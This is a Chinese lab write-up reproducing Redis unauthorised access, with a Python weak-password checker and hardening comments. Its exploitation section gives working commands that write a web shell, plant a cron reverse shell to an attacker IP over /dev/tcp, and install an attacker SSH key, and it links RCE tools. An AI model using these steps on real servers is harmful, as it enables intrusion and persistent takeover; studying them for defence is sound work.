redis未授权访问复现
redis未授权访问
1.环境搭建
wget http://download.redis.io/releases/redis-3.2.11.tar.gz
tar zxvf redis-3.2.11.tar.gz
cd redis-3.2.11
make
如果缺少make的话 apt install make
//上面的当我没说,我环境不允许,正在尝试centos
2.环境搭建(1)
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
vim redis.conf
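在 bind 127.0.0.1 前面加上 # 号注释掉,并把 protected-mode 设为 no(这两处改动去掉了 Redis 默认的本机绑定和保护模式,正是未授权访问的成因;加固时应反过来:保留 bind 127.0.0.1、protected-mode yes,并用 requirepass 设置强口令)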
./src/redis-server redis.conf
firewall-cmd --zone=public --remove-port=6379/tcp --permanent
firewall-cmd --reload
3.漏洞检测
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import socket
import sys
# Small sample of weak passwords that check() tries when the server asks for
# AUTH. A match on any entry means the instance's requirepass is guessable and
# should be replaced with a long random secret.
PASSWORD_DIC = [
    'redis',
    'root',
    'oracle',
    'password',
    'p@aaw0rd',
    'abc123!',
    '123456',
    'admin',
]
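def _redis_exchange(ip, port, payload):
    """Open one TCP connection, send *payload* (bytes) and return the first reply chunk."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((ip, port))
        s.sendall(payload)
        return s.recv(1024)
    finally:
        # Release the descriptor on every path, including timeout and refusal;
        # the previous version left one socket open per attempt.
        s.close()


def check(ip, port, timeout):
    """Audit one Redis endpoint for missing or weak authentication.

    Sends INFO without credentials. If the reply contains ``redis_version``
    the server answered an unauthenticated client, and the "unauthorised
    access" message is returned. If the reply mentions ``Authentication``,
    each entry of PASSWORD_DIC is tried with AUTH on a fresh connection and
    the "weak password" message naming the first accepted entry is returned.

    Args:
        ip: Host name or address of the Redis instance.
        port: TCP port; anything ``int()`` accepts.
        timeout: Seconds, applied via ``socket.setdefaulttimeout``.

    Returns:
        A unicode finding message, or None. None covers both "nothing found"
        and "could not connect / bad arguments", so it is not proof that the
        instance is hardened.
    """
    try:
        # NOTE: this sets the process-wide default timeout, as the original did.
        socket.setdefaulttimeout(timeout)
        port = int(port)

        # Payloads are bytes so the check also works on Python 3, where
        # sending str raised TypeError and was silently swallowed.
        result = _redis_exchange(ip, port, b"INFO\r\n")
        if b"redis_version" in result:
            return u"未授权访问"

        if b"Authentication" in result:
            for pass_ in PASSWORD_DIC:
                command = ("AUTH %s\r\n" % pass_).encode("utf-8")
                result = _redis_exchange(ip, port, command)
                if b"+OK" in result:
                    return u"存在弱口令,密码:%s" % (pass_)
    except (socket.error, ValueError, TypeError):
        # Unreachable host, timeout, or unusable ip/port/timeout: keep the
        # original best-effort contract and report no finding.
        return None
    return None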
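if __name__ == '__main__':
    # Two positional arguments are required: target host and port.
    # Without this guard a missing argument surfaced as a bare IndexError.
    if len(sys.argv) < 3:
        sys.stderr.write("usage: %s <ip> <port>\n" % sys.argv[0])
        sys.exit(2)
    ip = sys.argv[1]
    port = sys.argv[2]
    # print(...) with a single argument behaves the same on Python 2 and 3.
    # A printed None means no finding OR that the host could not be reached.
    print(check(ip, port, timeout=10))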
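4.漏洞利用
(下面 4.1–4.3 三种方式原理相同:都是通过 config set dir / dbfilename 再 save,让 Redis 把数据文件写到指定路径。防御上应以低权限专用用户运行 redis,用 rename-command 禁用或重命名 CONFIG 等危险命令,并监控 web 目录、cron 目录和 .ssh 目录中的异常文件写入。)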
4.1写webshell
redis-cli -h 192.168.164.147
config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo(); ?>"
save
4.2反弹shell
nc -lvnp 7999
set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
4.3写ssh公钥
在kali上生成ssh公钥
ssh-keygen -t rsa
cat id_rsa.pub
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa 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 root@kali\n\n\n"
save
ssh -i id_rsa [email protected]
4.4脚本利用
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/Ridter/redis-rce
5.参考文章
https://www.cnblogs.com/bmjoker/p/9548962.html
https://www.freebuf.com/vuls/223432.html
https://blog.csdn.net/fly_hps/article/details/80937837